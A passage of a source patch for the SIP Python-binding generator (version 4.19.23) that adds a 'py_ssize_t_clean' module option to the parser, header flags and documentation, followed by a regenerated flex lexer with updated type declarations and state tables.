-1; +@@ -2072,6 +2097,7 @@ module_arg: TK_KWARGS '=' TK_STRING_VALU + $$.kwargs = defaultKwArgs; + $$.name = NULL; + $$.use_arg_names = FALSE; ++ $$.py_ssize_t_clean = FALSE; + $$.use_limited_api = FALSE; + $$.all_raise_py_exc = FALSE; + $$.call_super_init = -1; +@@ -9513,9 +9539,9 @@ static void 
addProperty(sipSpec *pt, mod + */ + static moduleDef *configureModule(sipSpec *pt, moduleDef *module, + const char *filename, const char *name, int c_module, KwArgs kwargs, +- int use_arg_names, int use_limited_api, int call_super_init, +- int all_raise_py_exc, const char *def_error_handler, +- docstringDef *docstring) ++ int use_arg_names, int py_ssize_t_clean, int use_limited_api, ++ int call_super_init, int all_raise_py_exc, ++ const char *def_error_handler, docstringDef *docstring) + { + moduleDef *mod; + +@@ -9549,6 +9575,9 @@ static moduleDef *configureModule(sipSpe + if (use_arg_names) + setUseArgNames(module); + ++ if (py_ssize_t_clean) ++ setPY_SSIZE_T_CLEAN(module); ++ + if (use_limited_api) + setUseLimitedAPI(module); + +Index: sip-4.19.23/sipgen/sip.h +=================================================================== +--- sip-4.19.23.orig/sipgen/sip.h ++++ sip-4.19.23/sipgen/sip.h +@@ -93,6 +93,7 @@ + #define MOD_SUPER_INIT_UNDEF 0x0000 /* Calling super().__init__() is undefined. */ + #define MOD_SUPER_INIT_MASK 0x0180 /* The mask for the above flags. */ + #define MOD_SETTING_IMPORTS 0x0200 /* Imports are being set. */ ++#define MOD_PY_SSIZE_T_CLEAN 0x0400 /* #define PY_SSIZE_T_CLEAN. */ + + #define hasDelayedDtors(m) ((m)->modflags & MOD_HAS_DELAYED_DTORS) + #define setHasDelayedDtors(m) ((m)->modflags |= MOD_HAS_DELAYED_DTORS) +@@ -116,6 +117,8 @@ + #define settingImports(m) ((m)->modflags & MOD_SETTING_IMPORTS) + #define setSettingImports(m) ((m)->modflags |= MOD_SETTING_IMPORTS) + #define resetSettingImports(m) ((m)->modflags &= ~MOD_SETTING_IMPORTS) ++#define setPY_SSIZE_T_CLEAN(m) ((m)->modflags |= MOD_PY_SSIZE_T_CLEAN) ++#define isPY_SSIZE_T_CLEAN(m) ((m)->modflags & MOD_PY_SSIZE_T_CLEAN) + + + /* Handle section flags. 
*/ +@@ -1630,6 +1633,7 @@ typedef struct _moduleCfg { + KwArgs kwargs; + const char *name; + int use_arg_names; ++ int py_ssize_t_clean; + int use_limited_api; + int all_raise_py_exc; + int call_super_init; +Index: sip-4.19.23/sphinx/directives.rst +=================================================================== +--- sip-4.19.23.orig/sphinx/directives.rst ++++ sip-4.19.23/sphinx/directives.rst +@@ -1966,6 +1966,7 @@ then the pattern should instead be:: + [, default_VirtualErrorHandler = *name*] + [, keyword_arguments = ["None" | "All" | "Optional"]] + [, language = *string*] ++ [, py_ssize_t_clean = [True | False]] + [, use_argument_names = [True | False]] + [, use_limited_api = [True | False]] + [, version = *integer*]) +@@ -2004,6 +2005,9 @@ implied by the (deprecated) :option:`-k + ``language`` specifies the implementation language of the library being + wrapped. Its value is either ``"C++"`` (the default) or ``"C"``. + ++``py_ssize_t_clean`` specifies that the generated code should include ``#define ++PY_SSIZE_T_CLEAN`` before any ``#include <Python.h>``. ++ + When providing handwritten code as part of either the :directive:`%MethodCode` + or :directive:`%VirtualCatcherCode` directives the names of the arguments of + the function or method are based on the number of the argument, i.e. 
the first +Index: sip-4.19.23/sipgen/lexer.c +=================================================================== +--- sip-4.19.23.orig/sipgen/lexer.c ++++ sip-4.19.23/sipgen/lexer.c +@@ -1,6 +1,6 @@ +-#line 2 "sip-4.19.23/sipgen/lexer.c" ++#line 2 "../lexer.c" + +-#line 4 "sip-4.19.23/sipgen/lexer.c" ++#line 4 "../lexer.c" + + #define YY_INT_ALIGNED short int + +@@ -8,8 +8,8 @@ + + #define FLEX_SCANNER + #define YY_FLEX_MAJOR_VERSION 2 +-#define YY_FLEX_MINOR_VERSION 5 +-#define YY_FLEX_SUBMINOR_VERSION 35 ++#define YY_FLEX_MINOR_VERSION 6 ++#define YY_FLEX_SUBMINOR_VERSION 4 + #if YY_FLEX_SUBMINOR_VERSION > 0 + #define FLEX_BETA + #endif +@@ -47,7 +47,6 @@ typedef int16_t flex_int16_t; + typedef uint16_t flex_uint16_t; + typedef int32_t flex_int32_t; + typedef uint32_t flex_uint32_t; +-typedef uint64_t flex_uint64_t; + #else + typedef signed char flex_int8_t; + typedef short int flex_int16_t; +@@ -55,7 +54,6 @@ typedef int flex_int32_t; + typedef unsigned char flex_uint8_t; + typedef unsigned short int flex_uint16_t; + typedef unsigned int flex_uint32_t; +-#endif /* ! C99 */ + + /* Limits of integral types. */ + #ifndef INT8_MIN +@@ -86,63 +84,61 @@ typedef unsigned int flex_uint32_t; + #define UINT32_MAX (4294967295U) + #endif + +-#endif /* ! FLEXINT_H */ +- +-#ifdef __cplusplus +- +-/* The "const" storage-class-modifier is valid. */ +-#define YY_USE_CONST +- +-#else /* ! __cplusplus */ ++#ifndef SIZE_MAX ++#define SIZE_MAX (~(size_t)0) ++#endif + +-/* C99 requires __STDC__ to be defined as 1. */ +-#if defined (__STDC__) ++#endif /* ! C99 */ + +-#define YY_USE_CONST ++#endif /* ! FLEXINT_H */ + +-#endif /* defined (__STDC__) */ +-#endif /* ! __cplusplus */ ++/* begin standard C++ headers. 
*/ + +-#ifdef YY_USE_CONST ++/* TODO: this is always defined, so inline it */ + #define yyconst const ++ ++#if defined(__GNUC__) && __GNUC__ >= 3 ++#define yynoreturn __attribute__((__noreturn__)) + #else +-#define yyconst ++#define yynoreturn + #endif + + /* Returned upon end-of-file. */ + #define YY_NULL 0 + +-/* Promotes a possibly negative, possibly signed char to an unsigned +- * integer for use as an array index. If the signed char is negative, +- * we want to instead treat it as an 8-bit unsigned char, hence the +- * double cast. ++/* Promotes a possibly negative, possibly signed char to an ++ * integer in range [0..255] for use as an array index. + */ +-#define YY_SC_TO_UI(c) ((unsigned int) (unsigned char) c) ++#define YY_SC_TO_UI(c) ((YY_CHAR) (c)) + + /* Enter a start condition. This macro really ought to take a parameter, + * but we do it the disgusting crufty way forced on us by the ()-less + * definition of BEGIN. + */ + #define BEGIN (yy_start) = 1 + 2 * +- + /* Translate the current start state into a value that can be later handed + * to BEGIN to return to the state. The YYSTATE alias is for lex + * compatibility. + */ + #define YY_START (((yy_start) - 1) / 2) + #define YYSTATE YY_START +- + /* Action number for EOF rule of a given start state. */ + #define YY_STATE_EOF(state) (YY_END_OF_BUFFER + state + 1) +- + /* Special action meaning "start processing a new file". */ +-#define YY_NEW_FILE yyrestart(yyin ) +- ++#define YY_NEW_FILE yyrestart( yyin ) + #define YY_END_OF_BUFFER_CHAR 0 + + /* Size of default input buffer. */ + #ifndef YY_BUF_SIZE ++#ifdef __ia64__ ++/* On IA-64, the buffer size is 16k, not 8k. ++ * Moreover, YY_BUF_SIZE is 2*YY_READ_BUF_SIZE in the general case. ++ * Ditto for the __ia64__ case accordingly. ++ */ ++#define YY_BUF_SIZE 32768 ++#else + #define YY_BUF_SIZE 16384 ++#endif /* __ia64__ */ + #endif + + /* The state buf must be large enough to hold one state per character in the main buffer. 
+@@ -159,15 +155,16 @@ typedef struct yy_buffer_state *YY_BUFFE + typedef size_t yy_size_t; + #endif + +-extern yy_size_t yyleng; ++extern int yyleng; + + extern FILE *yyin, *yyout; + + #define EOB_ACT_CONTINUE_SCAN 0 + #define EOB_ACT_END_OF_FILE 1 + #define EOB_ACT_LAST_MATCH 2 +- ++ + #define YY_LESS_LINENO(n) ++ #define YY_LINENO_REWIND_TO(ptr) + + /* Return all but the first "n" matched characters back to the input stream. */ + #define yyless(n) \ +@@ -182,7 +179,6 @@ extern FILE *yyin, *yyout; + YY_DO_BEFORE_ACTION; /* set up yytext again */ \ + } \ + while ( 0 ) +- + #define unput(c) yyunput( c, (yytext_ptr) ) + + #ifndef YY_STRUCT_YY_BUFFER_STATE +@@ -197,12 +193,12 @@ struct yy_buffer_state + /* Size of input buffer in bytes, not including room for EOB + * characters. + */ +- yy_size_t yy_buf_size; ++ int yy_buf_size; + + /* Number of characters read into yy_ch_buf, not including EOB + * characters. + */ +- yy_size_t yy_n_chars; ++ int yy_n_chars; + + /* Whether we "own" the buffer - i.e., we know we created it, + * and can realloc() it to grow it, and should free() it to +@@ -225,7 +221,7 @@ struct yy_buffer_state + + int yy_bs_lineno; /**< The line count. */ + int yy_bs_column; /**< The column count. */ +- ++ + /* Whether to try to fill the input buffer when we reach the + * end of it. + */ +@@ -253,7 +249,7 @@ struct yy_buffer_state + /* Stack of input buffers. */ + static size_t yy_buffer_stack_top = 0; /**< index of top of stack. */ + static size_t yy_buffer_stack_max = 0; /**< capacity of stack. */ +-static YY_BUFFER_STATE * yy_buffer_stack = 0; /**< Stack as an array. */ ++static YY_BUFFER_STATE * yy_buffer_stack = NULL; /**< Stack as an array. */ + + /* We provide macros for accessing buffer states in case in the + * future we want to put the buffer states in a more general +@@ -264,7 +260,6 @@ static YY_BUFFER_STATE * yy_buffer_stack + #define YY_CURRENT_BUFFER ( (yy_buffer_stack) \ + ? 
(yy_buffer_stack)[(yy_buffer_stack_top)] \ + : NULL) +- + /* Same as previous macro, but useful when we know that the buffer stack is not + * NULL or when we need an lvalue. For internal use only. + */ +@@ -272,11 +267,11 @@ static YY_BUFFER_STATE * yy_buffer_stack + + /* yy_hold_char holds the character lost when yytext is formed. */ + static char yy_hold_char; +-static yy_size_t yy_n_chars; /* number of characters read into yy_ch_buf */ +-yy_size_t yyleng; ++static int yy_n_chars; /* number of characters read into yy_ch_buf */ ++int yyleng; + + /* Points to current character in buffer. */ +-static char *yy_c_buf_p = (char *) 0; ++static char *yy_c_buf_p = NULL; + static int yy_init = 0; /* whether we need to initialize */ + static int yy_start = 0; /* start state number */ + +@@ -285,84 +280,80 @@ static int yy_start = 0; /* start state + */ + static int yy_did_buffer_switch_on_eof; + +-void yyrestart (FILE *input_file ); +-void yy_switch_to_buffer (YY_BUFFER_STATE new_buffer ); +-YY_BUFFER_STATE yy_create_buffer (FILE *file,int size ); +-void yy_delete_buffer (YY_BUFFER_STATE b ); +-void yy_flush_buffer (YY_BUFFER_STATE b ); +-void yypush_buffer_state (YY_BUFFER_STATE new_buffer ); +-void yypop_buffer_state (void ); +- +-static void yyensure_buffer_stack (void ); +-static void yy_load_buffer_state (void ); +-static void yy_init_buffer (YY_BUFFER_STATE b,FILE *file ); +- +-#define YY_FLUSH_BUFFER yy_flush_buffer(YY_CURRENT_BUFFER ) +- +-YY_BUFFER_STATE yy_scan_buffer (char *base,yy_size_t size ); +-YY_BUFFER_STATE yy_scan_string (yyconst char *yy_str ); +-YY_BUFFER_STATE yy_scan_bytes (yyconst char *bytes,yy_size_t len ); +- +-void *yyalloc (yy_size_t ); +-void *yyrealloc (void *,yy_size_t ); +-void yyfree (void * ); ++void yyrestart ( FILE *input_file ); ++void yy_switch_to_buffer ( YY_BUFFER_STATE new_buffer ); ++YY_BUFFER_STATE yy_create_buffer ( FILE *file, int size ); ++void yy_delete_buffer ( YY_BUFFER_STATE b ); ++void yy_flush_buffer ( YY_BUFFER_STATE b 
); ++void yypush_buffer_state ( YY_BUFFER_STATE new_buffer ); ++void yypop_buffer_state ( void ); ++ ++static void yyensure_buffer_stack ( void ); ++static void yy_load_buffer_state ( void ); ++static void yy_init_buffer ( YY_BUFFER_STATE b, FILE *file ); ++#define YY_FLUSH_BUFFER yy_flush_buffer( YY_CURRENT_BUFFER ) ++ ++YY_BUFFER_STATE yy_scan_buffer ( char *base, yy_size_t size ); ++YY_BUFFER_STATE yy_scan_string ( const char *yy_str ); ++YY_BUFFER_STATE yy_scan_bytes ( const char *bytes, int len ); ++ ++void *yyalloc ( yy_size_t ); ++void *yyrealloc ( void *, yy_size_t ); ++void yyfree ( void * ); + + #define yy_new_buffer yy_create_buffer +- + #define yy_set_interactive(is_interactive) \ + { \ + if ( ! YY_CURRENT_BUFFER ){ \ + yyensure_buffer_stack (); \ + YY_CURRENT_BUFFER_LVALUE = \ +- yy_create_buffer(yyin,YY_BUF_SIZE ); \ ++ yy_create_buffer( yyin, YY_BUF_SIZE ); \ + } \ + YY_CURRENT_BUFFER_LVALUE->yy_is_interactive = is_interactive; \ + } +- + #define yy_set_bol(at_bol) \ + { \ + if ( ! 
YY_CURRENT_BUFFER ){\ + yyensure_buffer_stack (); \ + YY_CURRENT_BUFFER_LVALUE = \ +- yy_create_buffer(yyin,YY_BUF_SIZE ); \ ++ yy_create_buffer( yyin, YY_BUF_SIZE ); \ + } \ + YY_CURRENT_BUFFER_LVALUE->yy_at_bol = at_bol; \ + } +- + #define YY_AT_BOL() (YY_CURRENT_BUFFER_LVALUE->yy_at_bol) + + /* Begin user sect3 */ ++typedef flex_uint8_t YY_CHAR; + +-typedef unsigned char YY_CHAR; +- +-FILE *yyin = (FILE *) 0, *yyout = (FILE *) 0; ++FILE *yyin = NULL, *yyout = NULL; + + typedef int yy_state_type; + + extern int yylineno; +- + int yylineno = 1; + + extern char *yytext; ++#ifdef yytext_ptr ++#undef yytext_ptr ++#endif + #define yytext_ptr yytext + +-static yy_state_type yy_get_previous_state (void ); +-static yy_state_type yy_try_NUL_trans (yy_state_type current_state ); +-static int yy_get_next_buffer (void ); +-static void yy_fatal_error (yyconst char msg[] ); ++static yy_state_type yy_get_previous_state ( void ); ++static yy_state_type yy_try_NUL_trans ( yy_state_type current_state ); ++static int yy_get_next_buffer ( void ); ++static void yynoreturn yy_fatal_error ( const char* msg ); + + /* Done after the current pattern has been matched and before the + * corresponding action - sets up yytext. + */ + #define YY_DO_BEFORE_ACTION \ + (yytext_ptr) = yy_bp; \ +- yyleng = (yy_size_t) (yy_cp - yy_bp); \ ++ yyleng = (int) (yy_cp - yy_bp); \ + (yy_hold_char) = *yy_cp; \ + *yy_cp = '\0'; \ + (yy_c_buf_p) = yy_cp; +- +-#define YY_NUM_RULES 168 +-#define YY_END_OF_BUFFER 169 ++#define YY_NUM_RULES 170 ++#define YY_END_OF_BUFFER 171 + /* This struct is not used in this scanner, + but its presence is necessary. 
*/ + struct yy_trans_info +@@ -370,147 +361,149 @@ struct yy_trans_info + flex_int32_t yy_verify; + flex_int32_t yy_nxt; + }; +-static yyconst flex_int16_t yy_accept[1235] = ++static const flex_int16_t yy_accept[1261] = + { 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- 169, 167, 106, 109, 167, 167, 167, 167, 167, 111, +- 111, 167, 114, 114, 114, 114, 114, 114, 114, 114, +- 114, 114, 114, 114, 114, 114, 114, 114, 114, 114, +- 114, 167, 106, 167, 166, 165, 166, 166, 121, 119, +- 121, 108, 114, 114, 114, 114, 114, 114, 114, 114, +- 114, 114, 114, 114, 114, 114, 114, 114, 114, 106, +- 167, 107, 106, 167, 0, 116, 0, 0, 117, 0, +- 111, 0, 115, 112, 115, 118, 110, 112, 0, 112, +- 111, 0, 64, 114, 114, 114, 114, 114, 114, 114, +- +- 114, 114, 114, 114, 114, 114, 114, 114, 114, 114, +- 114, 114, 114, 114, 114, 114, 114, 114, 114, 114, +- 114, 114, 114, 114, 114, 65, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 120, +- 114, 114, 114, 114, 114, 114, 114, 86, 114, 114, +- 114, 114, 114, 114, 114, 114, 114, 114, 114, 114, +- 114, 0, 0, 0, 0, 0, 0, 112, 83, 115, +- 112, 110, 112, 0, 112, 113, 114, 114, 114, 114, +- 114, 114, 114, 114, 114, 114, 114, 114, 114, 42, +- +- 114, 114, 114, 114, 114, 114, 114, 114, 114, 114, +- 114, 114, 114, 114, 114, 114, 114, 114, 114, 114, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 16, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 114, 114, 114, 114, 114, 114, +- 85, 114, 114, 114, 114, 114, 114, 114, 94, 114, +- 114, 114, 114, 114, 0, 0, 112, 55, 114, 114, +- 114, 40, 38, 114, 114, 114, 48, 114, 114, 114, +- 114, 43, 114, 114, 114, 114, 114, 114, 114, 114, +- +- 114, 114, 114, 114, 114, 53, 114, 114, 114, 46, +- 114, 1, 0, 0, 0, 0, 0, 0, 0, 0, +- 0, 157, 11, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 164, 114, 104, 114, 114, 114, +- 114, 114, 114, 114, 90, 114, 114, 114, 114, 114, +- 97, 114, 114, 12, 114, 114, 114, 114, 114, 114, +- 114, 27, 51, 
114, 114, 54, 62, 44, 114, 114, +- 114, 114, 114, 41, 114, 114, 114, 35, 114, 114, +- +- 114, 59, 114, 114, 114, 114, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- 105, 114, 114, 114, 114, 114, 114, 114, 114, 92, +- 114, 114, 114, 114, 114, 114, 114, 37, 114, 114, +- 114, 114, 114, 114, 114, 45, 114, 114, 114, 114, +- 114, 29, 114, 49, 63, 52, 28, 114, 114, 114, +- 114, 114, 0, 0, 0, 0, 0, 0, 0, 0, +- +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 114, 114, +- 114, 84, 114, 114, 114, 114, 114, 114, 114, 114, +- 114, 114, 114, 36, 114, 114, 114, 114, 114, 114, +- 114, 114, 114, 114, 114, 114, 114, 114, 114, 114, +- 31, 114, 32, 114, 56, 114, 47, 39, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- +- 0, 0, 17, 0, 0, 0, 0, 0, 0, 0, +- 21, 0, 0, 0, 24, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 114, +- 114, 114, 114, 114, 114, 114, 114, 114, 114, 114, +- 114, 103, 34, 114, 114, 114, 114, 114, 114, 114, +- 114, 114, 114, 114, 114, 75, 114, 60, 114, 58, +- 114, 61, 50, 0, 0, 0, 0, 0, 0, 0, +- 0, 3, 0, 0, 0, 122, 0, 0, 0, 0, +- 127, 14, 0, 0, 0, 161, 0, 18, 0, 0, +- 19, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- +- 0, 0, 0, 0, 0, 162, 0, 0, 0, 0, +- 0, 0, 0, 114, 114, 114, 114, 88, 89, 91, +- 114, 114, 114, 114, 114, 33, 114, 114, 114, 114, +- 114, 114, 114, 114, 114, 114, 114, 114, 114, 114, +- 57, 30, 0, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 159, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 25, +- 0, 26, 137, 0, 0, 134, 0, 0, 0, 114, +- 114, 114, 114, 114, 95, 96, 114, 114, 114, 114, +- +- 114, 69, 68, 114, 114, 114, 72, 114, 114, 74, +- 114, 114, 114, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 156, +- 13, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 23, 0, 0, 0, +- 0, 153, 0, 0, 0, 0, 0, 114, 114, 114, +- 114, 114, 114, 114, 76, 114, 
114, 114, 71, 67, +- 82, 114, 114, 114, 114, 81, 160, 2, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- +- 0, 0, 20, 138, 136, 0, 0, 151, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 114, 114, +- 114, 114, 114, 114, 114, 73, 114, 66, 114, 114, +- 79, 80, 0, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 158, 0, 0, +- 0, 143, 0, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 114, 114, +- 114, 114, 114, 114, 114, 114, 77, 78, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 150, +- +- 0, 0, 0, 0, 0, 0, 0, 155, 0, 0, +- 0, 0, 114, 114, 114, 114, 114, 114, 114, 70, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 15, +- 0, 0, 0, 0, 0, 139, 152, 0, 0, 0, +- 0, 0, 114, 114, 114, 114, 93, 114, 114, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 142, 0, 0, +- 0, 0, 0, 129, 0, 0, 0, 0, 114, 101, +- 114, 114, 114, 99, 144, 0, 0, 0, 0, 0, +- +- 4, 0, 0, 0, 0, 0, 8, 9, 0, 0, +- 0, 0, 0, 0, 22, 0, 0, 0, 140, 0, +- 0, 114, 114, 114, 114, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 10, 0, 0, 133, 0, +- 128, 0, 0, 0, 0, 0, 114, 114, 87, 114, +- 0, 0, 148, 0, 0, 0, 0, 0, 124, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 114, +- 114, 98, 0, 0, 0, 0, 5, 0, 0, 0, +- 0, 126, 0, 131, 0, 0, 0, 141, 0, 114, +- 114, 149, 146, 0, 145, 123, 0, 0, 0, 0, +- +- 0, 0, 135, 163, 114, 114, 147, 0, 0, 0, +- 154, 0, 0, 114, 114, 125, 0, 0, 0, 130, +- 100, 114, 6, 0, 132, 114, 0, 114, 0, 114, +- 7, 114, 102, 0 ++ 171, 169, 108, 111, 169, 169, 169, 169, 169, 113, ++ 113, 169, 116, 116, 116, 116, 116, 116, 116, 116, ++ 116, 116, 116, 116, 116, 116, 116, 116, 116, 116, ++ 116, 116, 169, 108, 169, 168, 167, 168, 168, 123, ++ 121, 123, 110, 116, 116, 116, 116, 116, 116, 116, ++ 116, 116, 116, 116, 116, 116, 116, 116, 116, 116, ++ 116, 108, 169, 109, 108, 169, 0, 118, 0, 0, ++ 119, 0, 113, 0, 117, 114, 117, 120, 112, 114, ++ 0, 114, 113, 0, 64, 116, 116, 116, 116, 116, ++ ++ 116, 116, 116, 116, 116, 116, 116, 116, 116, 116, ++ 116, 116, 116, 116, 116, 116, 116, 116, 
116, 116, ++ 116, 116, 116, 116, 116, 116, 116, 116, 65, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 122, 116, 116, 116, 116, 116, 116, 116, ++ 87, 116, 116, 116, 116, 116, 116, 116, 116, 116, ++ 116, 116, 116, 116, 116, 0, 0, 0, 0, 0, ++ 0, 114, 84, 117, 114, 112, 114, 0, 114, 115, ++ 116, 116, 116, 116, 116, 116, 116, 116, 116, 116, ++ ++ 116, 116, 116, 116, 42, 116, 116, 116, 116, 116, ++ 116, 116, 116, 116, 116, 116, 116, 116, 116, 116, ++ 116, 116, 116, 116, 116, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 16, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 116, ++ 116, 116, 116, 116, 116, 86, 116, 116, 116, 116, ++ 116, 116, 116, 116, 95, 116, 116, 116, 116, 116, ++ 0, 0, 114, 55, 116, 116, 116, 116, 40, 38, ++ 116, 116, 116, 48, 116, 116, 116, 116, 43, 116, ++ ++ 116, 116, 116, 116, 116, 116, 116, 116, 116, 116, ++ 116, 116, 53, 116, 116, 116, 46, 116, 1, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 159, 11, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 0, 166, 116, 106, 116, 116, 116, 116, 116, 116, ++ 116, 91, 116, 116, 116, 116, 116, 116, 98, 116, ++ 116, 12, 116, 116, 116, 116, 116, 116, 116, 116, ++ 27, 51, 116, 116, 54, 62, 44, 116, 116, 116, ++ ++ 116, 116, 41, 116, 116, 116, 35, 116, 116, 116, ++ 59, 116, 116, 116, 116, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 107, ++ 116, 116, 116, 116, 116, 116, 116, 116, 93, 116, ++ 116, 116, 116, 116, 116, 116, 116, 116, 37, 116, ++ 116, 116, 116, 116, 116, 116, 45, 116, 116, 116, ++ 116, 116, 29, 116, 49, 63, 52, 28, 116, 116, ++ ++ 116, 116, 116, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 116, ++ 116, 116, 85, 116, 116, 116, 116, 116, 116, 116, ++ 116, 116, 116, 116, 116, 116, 36, 116, 116, 116, ++ 116, 116, 116, 
116, 116, 116, 116, 116, 116, 116, ++ 116, 116, 116, 31, 116, 32, 116, 56, 116, 47, ++ 39, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 17, 0, 0, 0, 0, ++ 0, 0, 0, 21, 0, 0, 0, 24, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 116, 116, 116, 116, 116, 116, 116, 116, ++ 116, 116, 116, 116, 116, 105, 116, 34, 116, 116, ++ 116, 116, 116, 116, 116, 116, 116, 116, 116, 116, ++ 75, 116, 60, 116, 58, 116, 61, 50, 0, 0, ++ 0, 0, 0, 0, 0, 0, 3, 0, 0, 0, ++ 124, 0, 0, 0, 0, 129, 14, 0, 0, 0, ++ ++ 163, 0, 18, 0, 0, 19, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 164, 0, 0, 0, 0, 0, 0, 0, 116, 116, ++ 116, 116, 89, 90, 92, 116, 116, 116, 116, 116, ++ 116, 116, 33, 116, 116, 116, 116, 116, 116, 116, ++ 116, 116, 116, 116, 116, 116, 116, 57, 30, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 161, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 0, 25, 0, 26, 139, ++ ++ 0, 0, 136, 0, 0, 0, 116, 116, 116, 116, ++ 116, 116, 96, 97, 116, 116, 82, 116, 116, 116, ++ 69, 68, 116, 116, 116, 72, 116, 116, 74, 116, ++ 116, 116, 0, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 158, 13, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 23, 0, 0, 0, 0, ++ 155, 0, 0, 0, 0, 0, 116, 116, 116, 116, ++ 116, 116, 116, 116, 76, 116, 116, 116, 71, 67, ++ 83, 116, 116, 116, 116, 81, 162, 2, 0, 0, ++ ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 20, 140, 138, 0, 0, 153, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 116, 116, ++ 116, 116, 116, 116, 116, 116, 73, 116, 66, 116, ++ 116, 79, 80, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 160, 0, ++ 0, 0, 145, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 116, ++ 116, 116, 116, 116, 116, 116, 116, 116, 77, 78, ++ ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 0, 152, 0, 0, 0, 0, 0, 0, 0, 157, ++ 0, 0, 0, 0, 116, 116, 116, 116, 116, 116, ++ 116, 116, 70, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 15, 0, 0, 0, 0, 0, 141, 154, 
